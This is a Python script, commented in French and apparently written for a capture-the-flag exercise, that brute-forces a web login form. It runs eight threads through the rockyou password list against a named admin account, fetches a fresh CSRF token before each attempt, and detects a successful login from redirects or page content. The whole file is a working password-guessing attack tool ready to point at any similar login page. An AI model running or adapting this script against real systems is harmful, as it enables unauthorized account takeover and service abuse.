import requests
from bs4 import BeautifulSoup
import threading
import time
from queue import Queue
import sys

# === CONFIGURATION ===
LOGIN_URL = "http://idm-new.powergrid.tcc/login"      # 🔁 À modifier
USERNAME = "ella.reed@powergrid.tcc"             # 🔁 Ton email admin
ROCKYOU_PATH = "/usr/share/SecLists-master/Passwords/rockyou.txt"  # ou "./rockyou.txt"
NUM_THREADS = 8                           # Ajuste selon la tolérance du serveur
CHECKPOINT_EVERY = 1000                 # Affichage toutes les 100k tentatives

# === Variables globales thread-safe ===
found_password = None
found_lock = threading.Lock()
global_counter = 0
counter_lock = threading.Lock()
stop_event = threading.Event()

# === Fonctions ===

def get_csrf_token(session):
    """Récupère un nouveau token CSRF via une session donnée."""
    try:
        resp = session.get(LOGIN_URL, timeout=10)
        soup = BeautifulSoup(resp.text, 'html.parser')
        csrf_input = soup.find('input', {'name': '_csrf_token'})
        if csrf_input:
            return csrf_input.get('value')
    except Exception as e:
        pass  # Échec silencieux pour ne pas bloquer
    return None

def is_login_successful(response):
    """Détermine si la connexion a réussi."""
    # 🔁 ADAPTE cette logique à ton CTF !
    # Exemples :
    # - Redirection vers /dashboard ?
    # - Absence du mot "login" ou "password" ?
    # - Présence d'un cookie de session ?
    
    if response.status_code == 302:
        location = response.headers.get('Location', '')
        if location and 'login' not in location.lower():
            return True
    # Alternative : vérifier le contenu
    if 'dashboard' in response.text.lower() or 'welcome' in response.text.lower():
        return True
    if '_password' not in response.text and response.status_code == 200:
        return True
    return False

def worker(password_queue):
    """Fonction exécutée par chaque thread."""
    global global_counter, found_password
    local_session = requests.Session()

    while not stop_event.is_set() and not password_queue.empty():
        try:
            password = password_queue.get_nowait()
        except:
            break  # Plus de mots de passe

        # Récupère un nouveau CSRF token (obligatoire à chaque tentative dans la plupart des cas)
        csrf = get_csrf_token(local_session)
        if not csrf:
            password_queue.task_done()
            continue

        # Tentative de login
        data = {
            '_username': USERNAME,
            '_password': password,
            '_csrf_token': csrf
        }

        try:
            resp = local_session.post(LOGIN_URL, data=data, timeout=10, allow_redirects=False)
        except:
            password_queue.task_done()
            continue

        # Vérification succès
        if is_login_successful(resp):
            with found_lock:
                if found_password is None:
                    found_password = password
                    stop_event.set()  # Signale à tous les threads d'arrêter
                    print(f"\n\n🎉 MOT DE PASSE TROUVÉ : '{password}'\n")
                    return

        # Mise à jour du compteur global
        with counter_lock:
            global_counter += 1
            current_count = global_counter
            if current_count % CHECKPOINT_EVERY == 0:
                print(f"[{time.strftime('%H:%M:%S')}] {current_count:,} mots de passe testés...")

        password_queue.task_done()

def main():
    global global_counter
    print(f"[+] Brute-force lancé pour : {USERNAME}")
    print(f"[+] Wordlist : {ROCKYOU_PATH}")
    print(f"[+] Threads : {NUM_THREADS}")
    print(f"[+] Rapport toutes les {CHECKPOINT_EVERY:,} tentatives\n")

    # Charger les mots de passe dans une file thread-safe
    password_queue = Queue()
    try:
        with open(ROCKYOU_PATH, 'r', encoding='latin-1', errors='ignore') as f:
            for line in f:
                pwd = line.strip()
                if pwd:
                    password_queue.put(pwd)
    except FileNotFoundError:
        print(f"❌ Fichier non trouvé : {ROCKYOU_PATH}")
        return

    total_passwords = password_queue.qsize()
    print(f"[+] {total_passwords:,} mots de passe chargés.\n")

    # Lancer les threads
    threads = []
    for _ in range(NUM_THREADS):
        t = threading.Thread(target=worker, args=(password_queue,))
        t.start()
        threads.append(t)

    # Attendre la fin (ou l'arrêt prématuré)
    try:
        for t in threads:
            t.join()
    except KeyboardInterrupt:
        print("\n[!] Interruption par l'utilisateur.")
        stop_event.set()

    if found_password is None:
        print(f"\n❌ Aucun mot de passe trouvé après {global_counter:,} tentatives.")

if __name__ == "__main__":
    main()
